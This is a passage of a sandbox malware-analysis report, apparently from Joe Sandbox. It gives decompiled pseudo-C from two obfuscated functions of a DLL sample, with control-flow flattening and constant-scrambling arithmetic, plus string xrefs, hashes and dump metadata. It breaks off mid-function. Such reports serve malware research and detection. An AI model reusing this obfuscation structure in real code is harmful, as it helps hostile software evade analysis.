0x00000000
0x00000000
0x10007a36
0x00000000
0x10007a36
0x100079d2
0x10007a45
0x10007a4b
0x00000000
0x00000000
0x00000000
0x10007a51
0x10007a0f
0x10007a11
0x10007a16
0x00000000
0x00000000
0x10007a18
0x10007a18
0x10007a40
0x00000000

Strings

GF5, xrefs: 10007A64
#, xrefs: 10007807
$ , xrefs: 100077BA
A, xrefs: 100078BA
Ki, xrefs: 10007772
}/R4, xrefs: 100079CC
Z, xrefs: 10007987
)e, xrefs: 1000790E
}/R4, xrefs: 10007A40
?, xrefs: 10007961

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
API String ID: 0-3391024520
Opcode ID: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
Instruction ID: 6fb6aebbe0e793b71eba00eb9a496bf6e95d0a7679540e47b5afb6deb3b7dbda
Opcode Fuzzy Hash: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
Instruction Fuzzy Hash: A5911271508380AFE359CF65C58980FBBE1FBC5798F50890DF29696260D3BA8A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001B165 Relevance: 11.6, Strings: 9, Instructions: 322
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001B165(signed int __ecx, intOrPtr* __edx) {
				signed int _t355;
				void* _t362;
				short* _t366;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				short _t412;
				void* _t415;
				intOrPtr* _t419;
				void* _t421;

				 *(_t421 + 0x94) = 0x72b2ac;
				 *(_t421 + 0x98) = 0x3313a1;
				_t412 = 0;
				 *(_t421 + 0xa0) = __ecx;
				 *((intOrPtr*)(_t421 + 0xac)) = 0;
				_t419 = __edx;
				 *(_t421 + 0x28) = 0x912c;
				 *(_t421 + 0x28) =  *(_t421 + 0x28) | 0x96fb441e;
				_t415 = 0x7c0af2;
				_t371 = 0x53;
				 *(_t421 + 0x2c) =  *(_t421 + 0x28) / _t371;
				_t372 = 0x54;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) / _t372;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00058b38;
				 *(_t421 + 0x5c) = 0xc013;
				 *(_t421 + 0x5c) =  *(_t421 + 0x5c) | 0xaee1eb4d;
				_t373 = 0x12;
				 *(_t421 + 0x58) =  *(_t421 + 0x5c) * 0x6b;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x186d60a5;
				 *(_t421 + 0x3c) = 0xace2;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) << 6;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) + 0x7229;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) ^ 0x402baaa9;
				 *(_t421 + 0x14) = 0xebdd;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 0xe;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) * 6;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0xffffac6e;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) ^ 0xffff9658;
				 *(_t421 + 0x7c) = 0xde69;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) * 0x6f;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x006039f6;
				 *(_t421 + 0x6c) = 0x3341;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) / _t373;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) * 0x2e;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) ^ 0x0000be9a;
				 *(_t421 + 0x1c) = 0xbddd;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) * 0x3d;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) >> 8;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x3ffb;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0x000052ea;
				 *(_t421 + 0x24) = 0xcd1f;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) >> 0xa;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xc8ca;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xffff7446;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) ^ 0x00001184;
				 *(_t421 + 0x68) = 0xd1f6;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d0ee771;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) | 0x146ba192;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d6fd061;
				 *(_t421 + 0x2c) = 0x301e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) * 0x69;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0xffff2f7e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0x7add;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00135481;
				 *(_t421 + 0x70) = 0x1444;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) << 9;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) * 0x58;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) ^ 0x0deed291;
				 *(_t421 + 0x40) = 0xdbcb;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) << 2;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) + 0x85c1;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) ^ 0x0003ec2c;
				 *(_t421 + 0x20) = 0xfb14;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) >> 0xf;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) + 0xffffe5e4;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x8e096c3b;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x71f69dd9;
				 *(_t421 + 0x78) = 0xa667;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) << 9;
				_t374 = 0x4b;
				 *(_t421 + 0x7c) =  *(_t421 + 0x78) * 0x23;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x2d804cb7;
				 *(_t421 + 0x4c) = 0x24eb;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0xffff8a60;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x432e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0xffffdfad;
				 *(_t421 + 0x1c) = 0x8ff7;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0xffff7e20;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x6b1c;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) | 0xe81a6241;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0xe81a424f;
				 *(_t421 + 0xa0) = 0x8ec2;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) * 0x28;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) ^ 0x001611ad;
				 *(_t421 + 0x58) = 0x8fa;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x94aafe32;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) | 0x50621cea;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0xd4eaf643;
				 *(_t421 + 0x68) = 0x3e9e;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) / _t374;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) + 0x4fd4;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x000029dc;
				 *(_t421 + 0x94) = 0x99a7;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) >> 4;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0x00007b7a;
				 *(_t421 + 0x38) = 0x83e0;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xb;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 9;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x00004453;
				 *(_t421 + 0x60) = 0xe6f7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) | 0x7af10f83;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0xd78f39d0;
				 *(_t421 + 0x78) = 0x97e9;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) + 0x9235;
				_t375 = 0xe;
				 *(_t421 + 0x74) =  *(_t421 + 0x78) / _t375;
				 *(_t421 + 0x74) =  *(_t421 + 0x74) ^ 0x000018b2;
				 *(_t421 + 0x30) = 0xd59f;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 0xa;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) ^ 0x9f00725b;
				 *(_t421 + 0x38) = 0xa6ba;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 0x10;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xc;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x000a754c;
				 *(_t421 + 0x60) = 0x53a7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) + 0x2bc6;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0x0002e6e9;
				 *(_t421 + 0x50) = 0x9b50;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 5;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 0xe;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) ^ 0x00007f5d;
				 *(_t421 + 0x4c) = 0x566e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x42f2;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x9896;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0x00014aa9;
				 *(_t421 + 0x94) = 0x126;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) + 0xffffea10;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0xffffa88e;
				 *(_t421 + 0x88) = 0x5486;
				_t376 = 0x51;
				 *(_t421 + 0x8c) =  *(_t421 + 0x88) / _t376;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00007ea1;
				 *(_t421 + 0x14) = 0x191d;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0x9b5;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 5;
				_t377 = 6;
				_t368 =  *(_t421 + 0xa0);
				 *(_t421 + 0x10) =  *(_t421 + 0x14) / _t377;
				 *(_t421 + 0x10) =  *(_t421 + 0x10) ^ 0x0000160b;
				 *(_t421 + 0x98) = 0x6a77;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50dbd;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50f69;
				 *(_t421 + 0x44) = 0x7616;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff0287;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff9d7b;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) ^ 0xffff183e;
				 *(_t421 + 0x8c) = 0xc1dc;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) + 0x7d7c;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00013d0b;
				 *(_t421 + 0x84) = 0xc54;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) >> 7;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) ^ 0x0000610f;
				 *(_t421 + 0x80) = 0xb84f;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) | 0xe7d082ca;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) ^ 0xe7d0dc6c;
				do {
					while(_t415 != 0x7c0af2) {
						if(_t415 == 0x131e8aac) {
							_push(_t377);
							_t377 = 0;
							_t355 = E1001C0C8(0,  *((intOrPtr*)(_t421 + 0x64)),  *((intOrPtr*)(_t421 + 0x54)),  *((intOrPtr*)(_t421 + 0x4e8)),  *((intOrPtr*)(_t421 + 0x54)),  *(_t421 + 0x78),  *(_t421 + 0x6c),  *(_t421 + 0x60), 0,  *(_t421 + 0x30),  *(_t421 + 0x50));
							_t368 = _t355;
							_t421 = _t421 + 0x28;
							__eflags = _t355 - 0xffffffff;
							if(__eflags != 0) {
								_t415 = 0x17f63d9e;
								continue;
							}
						} else {
							if(_t415 == 0x1531e410) {
								_push( *((intOrPtr*)(_t421 + 0x4c4)));
								_push( *(_t421 + 0x1c));
								_push( *(_t421 + 0x50));
								E1001BAEC(0x104, __eflags,  *(_t421 + 0x7c), E10005DFC( *(_t421 + 0x2c),  *(_t421 + 0x84), __eflags), _t421 + 0x2cc,  *(_t421 + 0x80),  *((intOrPtr*)(_t421 + 0xa8)),  *((intOrPtr*)(_t421 + 0x4dc)),  *((intOrPtr*)(_t421 + 0xb0)), _t421 + 0xbc);
								_t377 =  *(_t421 + 0x68);
								E10010D6D(_t377,  *((intOrPtr*)(_t421 + 0x90)),  *((intOrPtr*)(_t421 + 0xa4)), _t357);
								_t421 = _t421 + 0x34;
								_t415 = 0x131e8aac;
								continue;
							} else {
								if(_t415 == 0x17f63d9e) {
									_t298 = _t419 + 4; // 0xffff2ff9
									_t362 = E100169AC( *((intOrPtr*)(_t421 + 0xac)), _t298,  *_t419,  *((intOrPtr*)(_t421 + 0x9c)),  *(_t421 + 0x20), _t368,  *(_t421 + 0xa0), _t377,  *_t298);
									_t421 = _t421 + 0x1c;
									_t377 = 1;
									_t415 = 0x1a33388b;
									__eflags = _t362;
									_t412 =  !=  ? 1 : _t412;
									continue;
								} else {
									if(_t415 == 0x1a33388b) {
										E1000F1ED( *(_t421 + 0x50),  *(_t421 + 0x98),  *(_t421 + 0x8c),  *(_t421 + 0x84), _t368);
									} else {
										if(_t415 == 0x2700e9a0) {
											E10012631( *((intOrPtr*)(_t421 + 0x34)), _t421 + 0x2bc, __eflags,  *(_t421 + 0x74),  *(_t421 + 0x40));
											_pop(_t377);
											_t415 = 0x1531e410;
											continue;
										} else {
											_t430 = _t415 - 0x287e9283;
											if(_t415 != 0x287e9283) {
												goto L15;
											} else {
												_push(_t377);
												E1000DFD8( *(_t421 + 0x20), _t421 + 0xb8, _t430,  *(_t421 + 0x84),  *(_t421 + 0x70));
												_t366 = E1000BDCC(_t421 + 0xc0,  *(_t421 + 0x30),  *((intOrPtr*)(_t421 + 0x34)),  *(_t421 + 0x74));
												_t421 = _t421 + 0x14;
												_t415 = 0x2700e9a0;
												_t377 = 0;
												 *_t366 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t415 = 0x287e9283;
					L15:
					__eflags = _t415 - 0x2b84612a;
				} while (__eflags != 0);
				goto L18;
			}

0x1001b16b
0x1001b176
0x1001b185
0x1001b187
0x1001b18e
0x1001b195
0x1001b197
0x1001b1a1
0x1001b1a9
0x1001b1b4
0x1001b1b9
0x1001b1c3
0x1001b1c8
0x1001b1ce
0x1001b1d6
0x1001b1de
0x1001b1eb
0x1001b1ec
0x1001b1f0
0x1001b1f8
0x1001b200
0x1001b205
0x1001b20d
0x1001b215
0x1001b21d
0x1001b227
0x1001b22b
0x1001b233
0x1001b23b
0x1001b248
0x1001b24c
0x1001b254
0x1001b262
0x1001b26b
0x1001b26f
0x1001b277
0x1001b284
0x1001b288
0x1001b28d
0x1001b295
0x1001b29d
0x1001b2a5
0x1001b2aa
0x1001b2b2
0x1001b2ba
0x1001b2c2
0x1001b2ca
0x1001b2d2
0x1001b2da
0x1001b2e2
0x1001b2ef
0x1001b2f3
0x1001b2fb
0x1001b303
0x1001b30b
0x1001b313
0x1001b31d
0x1001b321
0x1001b329
0x1001b333
0x1001b338
0x1001b340
0x1001b348
0x1001b350
0x1001b355
0x1001b35d
0x1001b365
0x1001b36d
0x1001b375
0x1001b381
0x1001b384
0x1001b388
0x1001b390
0x1001b398
0x1001b3a0
0x1001b3a8
0x1001b3b0
0x1001b3b8
0x1001b3c0
0x1001b3c8
0x1001b3d0
0x1001b3d8
0x1001b3eb
0x1001b3f2
0x1001b3fd
0x1001b405
0x1001b40d
0x1001b415
0x1001b41d
0x1001b42d
0x1001b431
0x1001b439
0x1001b441
0x1001b44c
0x1001b454
0x1001b45f
0x1001b467
0x1001b46c
0x1001b471
0x1001b479
0x1001b481
0x1001b489
0x1001b48e
0x1001b496
0x1001b49e
0x1001b4aa
0x1001b4ad
0x1001b4b1
0x1001b4b9
0x1001b4c1
0x1001b4c6
0x1001b4cb
0x1001b4d0
0x1001b4d8
0x1001b4e0
0x1001b4e5
0x1001b4ea
0x1001b4f2
0x1001b4fa
0x1001b4ff
0x1001b507
0x1001b50f
0x1001b517
0x1001b51c
0x1001b521
0x1001b529
0x1001b531
0x1001b539
0x1001b541
0x1001b549
0x1001b556
0x1001b561
0x1001b56c
0x1001b580
0x1001b585
0x1001b58e
0x1001b599
0x1001b5a1
0x1001b5a9
0x1001b5b2
0x1001b5b5
0x1001b5bc
0x1001b5c0
0x1001b5c8
0x1001b5d3
0x1001b5de
0x1001b5e9
0x1001b5f1
0x1001b5f9
0x1001b601
0x1001b609
0x1001b614
0x1001b61f
0x1001b62a
0x1001b635
0x1001b63d
0x1001b648
0x1001b653
0x1001b65e
0x1001b669
0x1001b669
0x1001b67b
0x1001b7e8
0x1001b7f6
0x1001b813
0x1001b818
0x1001b81a
0x1001b81d
0x1001b820
0x1001b822
0x00000000
0x1001b822
0x1001b681
0x1001b687
0x1001b760
0x1001b767
0x1001b76b
0x1001b7be
0x1001b7d2
0x1001b7d6
0x1001b7db
0x1001b7de
0x00000000
0x1001b68d
0x1001b693
0x1001b723
0x1001b746
0x1001b74d
0x1001b750
0x1001b751
0x1001b756
0x1001b758
0x00000000
0x1001b699
0x1001b69f
0x1001b859
0x1001b6a5
0x1001b6ab
0x1001b712
0x1001b718
0x1001b719
0x00000000
0x1001b6ad
0x1001b6ad
0x1001b6b3
0x00000000
0x1001b6b9
0x1001b6b9
0x1001b6d0
0x1001b6e8
0x1001b6ed
0x1001b6f0
0x1001b6f5
0x1001b6f7
0x00000000
0x1001b6f7
0x1001b6b3
0x1001b6ab
0x1001b69f
0x1001b693
0x1001b687
0x1001b861
0x1001b86d
0x1001b86d
0x1001b82c
0x1001b831
0x1001b831
0x1001b831
0x00000000

Strings

z{, xrefs: 1001B454
[r, xrefs: 1001B4D0
A3, xrefs: 1001B254
R, xrefs: 1001B295
nV, xrefs: 1001B529
Lu, xrefs: 1001B4EA
wj, xrefs: 1001B5C8
)r, xrefs: 1001B205
|}, xrefs: 1001B614

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
API String ID: 0-850793479
Opcode ID: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
Instruction ID: ff7997cc39c5c8e1588c79542998d773369cd8b1a20915bd84ed02729729e805
Opcode Fuzzy Hash: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
Instruction Fuzzy Hash: A8F1E2715087819FE364CF21C48AA4BBBE1FBC4758F10891DF5E9962A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10018C2B Relevance: 11.6, Strings: 9, Instructions: 310
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10018C2B() {
				char _v520;
				short _v524;
				short _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr* _v544;
				intOrPtr _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t300;
				intOrPtr _t302;
				short _t306;
				short _t308;
				short _t309;
				intOrPtr _t312;
				void* _t317;
				intOrPtr* _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				intOrPtr _t353;
				intOrPtr* _t354;
				short _t355;
				signed int* _t357;

				_t357 =  &_v680;
				_v536 = 0x205681;
				_v532 = 0x662dd;
				_t317 = 0x1e086586;
				_t355 = 0;
				_v528 = 0;
				_v524 = 0;
				_v652 = 0xf058;
				_t350 = 0x3f;
				_v652 = _v652 / _t350;
				_v652 = _v652 ^ 0xf52b0b85;
				_v652 = _v652 ^ 0x1b04eaa7;
				_v652 = _v652 ^ 0xee2fe2f3;
				_v604 = 0x95c0;
				_v604 = _v604 | 0x84eb5d1b;
				_v604 = _v604 ^ 0x37b71fa3;
				_v604 = _v604 ^ 0xb35cc279;
				_v632 = 0xdad5;
				_v632 = _v632 >> 1;
				_v632 = _v632 | 0x6db5f9e1;
				_v632 = _v632 ^ 0x6db5e788;
				_v616 = 0xf7c4;
				_v616 = _v616 + 0xffffc625;
				_v616 = _v616 + 0x83c2;
				_v616 = _v616 ^ 0x000171e4;
				_v620 = 0xd68a;
				_v620 = _v620 ^ 0xd8043047;
				_v620 = _v620 + 0xb99d;
				_v620 = _v620 ^ 0xd805aeb2;
				_v600 = 0xba3e;
				_v600 = _v600 + 0xffff4aed;
				_v600 = _v600 ^ 0xbcc6d77f;
				_v600 = _v600 ^ 0xbcc6d5de;
				_v676 = 0x731e;
				_v676 = _v676 ^ 0x5ee95724;
				_v676 = _v676 << 1;
				_v676 = _v676 ^ 0x578f8622;
				_v676 = _v676 ^ 0xea5dba2f;
				_v564 = 0xdb79;
				_v564 = _v564 + 0xffff5324;
				_v564 = _v564 ^ 0x000059e2;
				_v656 = 0x318b;
				_v656 = _v656 * 0x75;
				_v656 = _v656 | 0xae3833e5;
				_v656 = _v656 ^ 0x79d8626c;
				_v656 = _v656 ^ 0xd7e6dd07;
				_v612 = 0xd72f;
				_v612 = _v612 | 0xacf7f151;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0xf77f2cdc;
				_v588 = 0x6e25;
				_v588 = _v588 | 0xb635d493;
				_v588 = _v588 ^ 0xb635a7f6;
				_v664 = 0x854b;
				_v664 = _v664 >> 2;
				_v664 = _v664 + 0xffff5540;
				_v664 = _v664 + 0xffff815d;
				_v664 = _v664 ^ 0xfffeba3d;
				_v628 = 0x2397;
				_v628 = _v628 ^ 0xd486bf36;
				_v628 = _v628 * 0x57;
				_v628 = _v628 ^ 0x39bf10ef;
				_v592 = 0x332f;
				_v592 = _v592 << 0xf;
				_v592 = _v592 ^ 0x1997d067;
				_v584 = 0x9daa;
				_v584 = _v584 ^ 0xc1827730;
				_v584 = _v584 ^ 0xc182cb74;
				_v552 = 0xead9;
				_v552 = _v552 << 0x10;
				_v552 = _v552 ^ 0xead93b3b;
				_v568 = 0x955d;
				_v568 = _v568 >> 4;
				_v568 = _v568 ^ 0x00001627;
				_v668 = 0x4c8;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xabe4;
				_v668 = _v668 | 0x24ffa7bc;
				_v668 = _v668 ^ 0x24fff134;
				_v608 = 0xf88a;
				_v608 = _v608 ^ 0x49fbfdea;
				_v608 = _v608 << 5;
				_v608 = _v608 ^ 0x3f60b2d9;
				_v660 = 0xc005;
				_v660 = _v660 << 0xa;
				_v660 = _v660 ^ 0xddadac51;
				_v660 = _v660 | 0xebc284be;
				_v660 = _v660 ^ 0xffefbdbf;
				_v560 = 0xaa76;
				_v560 = _v560 >> 0xa;
				_v560 = _v560 ^ 0x0000145f;
				_v680 = 0x11f3;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 + 0x9fae;
				_v680 = _v680 + 0xffffa8e8;
				_v680 = _v680 ^ 0x000040be;
				_v556 = 0x5f3c;
				_v556 = _v556 << 0xd;
				_v556 = _v556 ^ 0x0be7cdfb;
				_v640 = 0x303f;
				_v640 = _v640 | 0xdf49b5a6;
				_v640 = _v640 + 0xffffa103;
				_v640 = _v640 ^ 0xdf496290;
				_v636 = 0xc44a;
				_v636 = _v636 << 9;
				_t351 = 0x24;
				_v636 = _v636 / _t351;
				_v636 = _v636 ^ 0x000ae4ba;
				_v672 = 0xae3b;
				_v672 = _v672 | 0xebb53fed;
				_v672 = _v672 << 0xa;
				_v672 = _v672 ^ 0xd6fff3bd;
				_v576 = 0x604f;
				_v576 = _v576 + 0x4aad;
				_v576 = _v576 ^ 0x0000811b;
				_v624 = 0x82fc;
				_t352 = 0x4d;
				_t349 = _v544;
				_t316 = _v544;
				_v624 = _v624 * 0xb;
				_v624 = _v624 ^ 0xf6599f92;
				_v624 = _v624 ^ 0xf65c714c;
				_v572 = 0x87e5;
				_v572 = _v572 | 0x0de14e4e;
				_v572 = _v572 ^ 0x0de1e3d5;
				_v580 = 0xaa00;
				_v580 = _v580 >> 0xf;
				_v580 = _v580 ^ 0x00000356;
				_v596 = 0x78ee;
				_v596 = _v596 * 0x44;
				_v596 = _v596 >> 1;
				_v596 = _v596 ^ 0x00108f9c;
				_v648 = 0x727e;
				_t353 = _v548;
				_v648 = _v648 / _t352;
				_v648 = _v648 ^ 0x94612659;
				_v648 = _v648 + 0xffff79fc;
				_v648 = _v648 ^ 0x9460d1f8;
				_v644 = 0x1b66;
				_v644 = _v644 ^ 0x7f7a90b3;
				_v644 = _v644 ^ 0x38b35886;
				_v644 = _v644 ^ 0x47c9d350;
				while(1) {
					_t300 = 0xbce5228;
					L2:
					while(_t317 != 0x31c8274) {
						if(_t317 == 0x6eb678d) {
							E1000F1ED(_v572, _v580, _v596, _v648, _t316);
						} else {
							if(_t317 == _t300) {
								_t306 = E1000ACE6(_t349, _v552, _t317, _t317, _t316, _t353, _v568, _v652, _v668, _v608, _t317,  &_v540, _v660, _v560);
								_t357 =  &(_t357[0xc]);
								__eflags = _t306;
								if(_t306 != 0) {
									_t354 = _t349;
									while(1) {
										__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
										if( *((intOrPtr*)(_t354 + 4)) != 4) {
											goto L17;
										}
										L16:
										_t309 = E10007F4B(_t354 + 0xc, _v680, _v544, _v556, _v640);
										_t357 =  &(_t357[3]);
										__eflags = _t309;
										if(_t309 == 0) {
											_t355 = 1;
											__eflags = 1;
										} else {
											goto L17;
										}
										L20:
										_t353 = _v548;
										goto L21;
										L17:
										_t308 =  *_t354;
										__eflags = _t308;
										if(_t308 != 0) {
											_t354 = _t354 + _t308;
											__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
											if( *((intOrPtr*)(_t354 + 4)) != 4) {
												goto L17;
											}
										}
										goto L20;
									}
								}
								L21:
								__eflags = _t355;
								if(__eflags == 0) {
									_t300 = 0xbce5228;
									_t317 = 0xbce5228;
									continue;
								} else {
									E10012551(_v636,  *((intOrPtr*)( *0x10021090 + 0x1c)), _v672);
									_t317 = 0xc17c725;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								}
								L31:
							} else {
								if(_t317 == 0xc17c725) {
									E1000DE81(_v576, _t349, _v624);
									_t317 = 0x6eb678d;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								} else {
									if(_t317 == 0x1e086586) {
										_t317 = 0x1e3f627f;
										continue;
									} else {
										if(_t317 == 0x1e3f627f) {
											_push(_t317);
											E1000DFD8(_v632,  &_v520, __eflags, _v616, _v620);
											_t312 = E1000BDCC( &_v520, _v600, _v676, _v564);
											_t357 =  &(_t357[5]);
											_v544 = _t312;
											 *((short*)(_t312 - 2)) = 0;
											_t317 = 0x31c8274;
											while(1) {
												_t300 = 0xbce5228;
												goto L2;
											}
										} else {
											if(_t317 != 0x265fc3c2) {
												L27:
												__eflags = _t317 - 0x2fa258b4;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t353 = 0x1000;
												_push(_t317);
												_v548 = 0x1000;
												_t349 = E100054FB(0x1000);
												_t300 = 0xbce5228;
												_t317 =  !=  ? 0xbce5228 : 0x6eb678d;
												continue;
											}
										}
									}
								}
							}
						}
						L30:
						__eflags = 0;
						return 0;
						goto L31;
					}
					_push(_t317);
					_t302 = E1001C0C8(_v604 | 0x00000006, 1, _v656,  &_v520, _v612, _v588, 0x2000000, _v664, _t317, _v644, _v628);
					_t316 = _t302;
					_t357 =  &(_t357[0xa]);
					__eflags = _t302 - 0xffffffff;
					if(__eflags == 0) {
						_t317 = 0x2fa258b4;
						_t300 = 0xbce5228;
						goto L27;
